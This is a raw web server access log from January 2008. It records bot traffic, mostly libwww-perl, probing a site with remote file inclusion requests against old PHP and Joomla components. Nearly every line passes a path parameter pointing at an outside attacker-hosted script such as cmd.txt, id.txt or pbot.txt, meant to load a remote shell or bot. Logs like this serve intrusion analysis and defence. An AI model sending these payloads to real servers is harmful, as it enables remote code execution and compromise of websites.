62.193.240.89 - - [12/Jan/2008:12:41:30 -0800] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.slk.co.th/images/erick.gif??? HTTP/1.1" 404 322 "-" "libwww-perl/5.79" "www.projectpr.com"
62.193.240.89 - - [12/Jan/2008:12:41:30 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.slk.co.th/images/erick.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
217.160.191.59 - - [12/Jan/2008:12:42:33 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.160.191.59 - - [12/Jan/2008:12:42:34 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
217.160.191.59 - - [12/Jan/2008:12:42:34 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
70.84.14.132 - - [12/Jan/2008:12:43:13 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:12:44:00 -0800] "GET /logs/access.log//claroline/inc/claro_init_header.inc.php?includePath=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:12:44:06 -0800] "GET //claroline/inc/claro_init_header.inc.php?includePath=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.57.128.49 - - [12/Jan/2008:12:44:11 -0800] "GET /logs//claroline/inc/claro_init_header.inc.php?includePath=http://charitygrants.org/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:12:44:16 -0800] "GET /logs/access_070912.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:45:41 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 308 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:45:41 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
80.86.81.245 - - [12/Jan/2008:12:46:14 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.212.80.130 - - [12/Jan/2008:12:47:18 -0800] "GET /logs/access_%3Cwbr%20/%3E071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://catzu.altervista.org/80.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.212.80.130 - - [12/Jan/2008:12:47:18 -0800] "GET /logs/access_%3Cwbr%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://catzu.altervista.org/80.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.110.156.59 - - [12/Jan/2008:12:48:19 -0800] "GET //include.php?path[docroot]=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
217.160.191.59 - - [12/Jan/2008:12:49:36 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:12:51:07 -0800] "GET /logs/access_070812.log/modules/vwar/admin/admin.php?vwar_root=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 297 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:12:51:08 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
81.169.157.91 - - [12/Jan/2008:12:51:08 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.sboard.de/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
72.36.227.10 - - [12/Jan/2008:12:51:24 -0800] "GET /logs/access_070812.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.financejobdirectory.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.14.84.240 - - [12/Jan/2008:12:51:47 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://slcdelivery.com/banners/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
216.14.84.240 - - [12/Jan/2008:12:51:47 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://slcdelivery.com/banners/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
121.97.223.161 - - [12/Jan/2008:12:52:22 -0800] "GET /logs/access_%3Cwbr%20/%3E071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 305 "-" "libwww-perl/5.65" "www.projectpr.com"
121.97.223.161 - - [12/Jan/2008:12:52:22 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
121.97.223.161 - - [12/Jan/2008:12:52:23 -0800] "GET /logs/access_%3Cwbr%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.geocities.com/dor_boom/djd.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
122.132.140.60 - - [12/Jan/2008:12:52:33 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
122.132.140.60 - - [12/Jan/2008:12:52:39 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805" "www.projectpr.com"
122.132.140.60 - - [12/Jan/2008:12:52:44 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:12:54:33 -0800] "GET /logs/access_070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:12:54:33 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:12:54:33 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.92.73.80 - - [12/Jan/2008:12:54:42 -0800] "GET /logs/access_070712.log//components/com_phpshop/standalone/stubjambo.php?baseDir=http://autismsocietysa.org/Owl/Documents/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
74.6.8.120 - - [12/Jan/2008:12:55:02 -0800] "GET /logs/access_070912.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.projectpr.com"
85.214.68.70 - - [12/Jan/2008:12:55:05 -0800] "GET //?mosConfig_live_site=http://rapidgets.org/cmd? HTTP/1.1" 200 9521 "-" "libwww-perl/5.803" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:55:39 -0800] "GET /logs/access_%3Cwbr%20/%3E071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 321 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:55:39 -0800] "GET /logs/access_%3Cwbr%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:55:44 -0800] "GET /logs/access_%3Cwbr%20/%3E071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
69.89.25.162 - - [12/Jan/2008:12:55:45 -0800] "GET /logs/access_%3Cwbr%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:12:55:59 -0800] "GET /logs/access_070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:12:55:59 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:12:55:59 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:13:00:41 -0800] "GET /logs/access_070712.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:13:00:41 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:13:00:41 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.214.68.70 - - [12/Jan/2008:13:01:25 -0800] "GET /logs/access.log//?mosConfig_live_site=http://rapidgets.org/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
85.214.68.70 - - [12/Jan/2008:13:01:25 -0800] "GET /logs//?mosConfig_live_site=http://rapidgets.org/cmd? HTTP/1.1" 200 4518 "-" "libwww-perl/5.803" "www.projectpr.com"
213.195.65.245 - - [12/Jan/2008:13:01:46 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://slcdelivery.com/banners/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
213.195.65.245 - - [12/Jan/2008:13:01:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://slcdelivery.com/banners/frame.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:13:02:22 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:13:03:03 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:13:03:25 -0800] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.projectpr.com"
85.249.135.2 - - [12/Jan/2008:13:05:33 -0800] "GET /logs/access.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://kjbaudry.com/KJBiProject/Qe3? HTTP/1.1" 404 330 "-" "libwww-perl/5.803" "www.projectpr.com"
74.54.58.178 - - [12/Jan/2008:13:07:35 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.windshieldpro.ca/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.projectpr.com"
74.54.58.178 - - [12/Jan/2008:13:07:35 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.windshieldpro.ca/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:13:09:09 -0800] "GET /logs/access_070812.log//addpost_newpoll.php?addpoll=preview&thispath=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 289 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:13:09:10 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.134.215 - - [12/Jan/2008:13:13:43 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.134.215 - - [12/Jan/2008:13:13:43 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.134.215 - - [12/Jan/2008:13:13:43 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 294 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.134.215 - - [12/Jan/2008:13:14:33 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 305 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.134.215 - - [12/Jan/2008:13:14:34 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
207.58.134.215 - - [12/Jan/2008:13:14:34 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ankorart.com/tmp/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
122.132.140.60 - - [12/Jan/2008:13:14:44 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:13:14:57 -0800] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:13:14:57 -0800] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:13:14:57 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
85.214.68.70 - - [12/Jan/2008:13:15:16 -0800] "GET /logs/access_071112.log//?mosConfig_live_site=http://rapidgets.org/cmd? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
80.203.157.250 - - [12/Jan/2008:13:21:36 -0800] "GET //?mosConfig_live_site=http://rapidgets.org/cmd? HTTP/1.1" 200 9521 "-" "libwww-perl/5.803" "www.projectpr.com"
65.254.58.42 - - [12/Jan/2008:13:21:44 -0800] "GET /logs/access_070812.log//components/com_simpleboard/image_upload.php?sbp=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.254.58.42 - - [12/Jan/2008:13:21:44 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
65.254.58.42 - - [12/Jan/2008:13:21:44 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 295 "-" "libwww-perl/5.808" "www.projectpr.com"
85.214.29.90 - - [12/Jan/2008:13:24:52 -0800] "GET /logs/access_070812.log//components/com_simpleboard/image_upload.php?sbp=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
85.214.29.90 - - [12/Jan/2008:13:24:52 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
85.214.29.90 - - [12/Jan/2008:13:24:53 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:13:25:08 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 298 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:13:25:09 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
72.9.145.107 - - [12/Jan/2008:13:25:09 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.98.134.36 - - [12/Jan/2008:13:25:12 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.windshieldpro.ca/test.txt??? HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.projectpr.com"
66.98.134.36 - - [12/Jan/2008:13:25:14 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.windshieldpro.ca/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.projectpr.com"
74.52.170.162 - - [12/Jan/2008:13:26:19 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
89.110.156.59 - - [12/Jan/2008:13:30:04 -0800] "GET /logs/access.log//include.php?path[docroot]=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.803" "www.projectpr.com"
89.110.156.59 - - [12/Jan/2008:13:30:04 -0800] "GET /logs//include.php?path[docroot]=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:13:30:31 -0800] "GET /logs/access_070712.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.64" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:13:30:32 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:13:30:32 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:13:33:04 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:13:33:05 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
67.15.12.20 - - [12/Jan/2008:13:33:05 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.203.157.250 - - [12/Jan/2008:13:33:38 -0800] "GET /logs/access.log//?mosConfig_live_site=http://rapidgets.org/cmd? HTTP/1.1" 404 263 "-" "libwww-perl/5.803" "www.projectpr.com"
80.203.157.250 - - [12/Jan/2008:13:33:39 -0800] "GET /logs//?mosConfig_live_site=http://rapidgets.org/cmd? HTTP/1.1" 200 4518 "-" "libwww-perl/5.803" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:13:33:43 -0800] "GET /index.php?redir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.projectpr.com"
207.44.188.10 - - [12/Jan/2008:13:33:43 -0800] "GET /logs/index.php?redir=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:13:36:44 -0800] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://epics.ecn.purdue.edu/lsc/setup_pages.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:13:37:52 -0800] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://epics.ecn.purdue.edu/lsc/setup_pages.txt??? HTTP/1.0" 404 289 "-" "libwww-perl/5.53" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:13:38:29 -0800] "GET /logs/access_070712.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:13:38:30 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:13:38:30 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
74.53.58.15 - - [12/Jan/2008:13:39:10 -0800] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://seucu.us/pbot.txt?? HTTP/1.1" 404 305 "-" "libwww-perl/5.808" "www.projectpr.com"
74.52.9.218 - - [12/Jan/2008:13:40:58 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.aneuk.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:13:42:30 -0800] "GET /logs/access_070812.log//modules/vwar/admin/admin.php?vwar_root=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 298 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:13:42:30 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
213.194.124.84 - - [12/Jan/2008:13:42:31 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://classico.sinte.com.br/modules/Forums/admin/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
122.132.140.60 - - [12/Jan/2008:13:42:48 -0800] "GET /logs/access_071112.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.shikea.se/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.93.58.70 - - [12/Jan/2008:13:43:12 -0800] "GET /logs/access_070712.log//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 294 "-" "libwww-perl/5.805" "www.projectpr.com"
80.93.58.70 - - [12/Jan/2008:13:43:13 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
80.93.58.70 - - [12/Jan/2008:13:43:13 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
69.93.83.98 - - [12/Jan/2008:13:44:19 -0800] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mee.chu.edu.tw/images/red.gif????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:13:44:55 -0800] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://epics.ecn.purdue.edu/lsc/setup_pages.txt??? HTTP/1.0" 404 312 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:13:44:55 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://epics.ecn.purdue.edu/lsc/setup_pages.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:13:44:56 -0800] "GET /logs/access_070812.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://epics.ecn.purdue.edu/lsc/setup_pages.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
199.237.204.148 - - [12/Jan/2008:13:44:56 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://epics.ecn.purdue.edu/lsc/setup_pages.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:46:03 -0800] "GET /logs/access_%3Cwbr%20/%3E070912.log///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 347 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:46:04 -0800] "GET /logs/access_%3Cwbr%20/%3E070912.log///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:46:04 -0800] "GET ///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:46:04 -0800] "GET ///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.206.143.90 - - [12/Jan/2008:13:46:04 -0800] "GET /logs/access_%3Cwbr%20///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://rmk.se/bilder/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
